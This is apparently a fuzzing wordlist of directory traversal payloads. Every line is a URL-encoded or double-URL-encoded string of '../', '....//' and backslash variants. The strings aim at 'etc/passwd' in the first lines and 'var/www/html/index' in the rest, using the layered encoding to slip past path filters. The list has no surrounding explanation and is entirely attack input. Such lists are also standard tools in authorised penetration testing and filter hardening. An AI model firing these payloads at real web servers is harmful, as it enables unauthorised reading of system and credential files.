%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2f%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2e%2e%2e%2f%2f%2f%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%5c%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%5c%2e%2e%2e%2f%2f%2f%2f%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%2e%2e%2e%2e%2f%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%35%63%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%66%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%5c%2e%2e%2f%2e%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%35%63%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%5c%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%32%66%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%5c%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%35%63%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%2e%2e%2e%2e%5c%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%32%65%25%32%65%25%32%65%25%32%65%25%35%63%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%56%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%35%36%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%32%65%25%32%65%25%32%65%25%32%66%25%32%65%25%32%66%25%37%36%25%36%31%25%37%32%25%32%66%25%37%37%25%37%37%25%37%37%25%32%66%25%36%38%25%37%34%25%36%64%25%36%63%25%32%66%25%36%39%25%36%65%25%36%34%25%36%35%25%37%38
%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%2e%2e%2e%2f%2e%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%69%6e%64%65%78
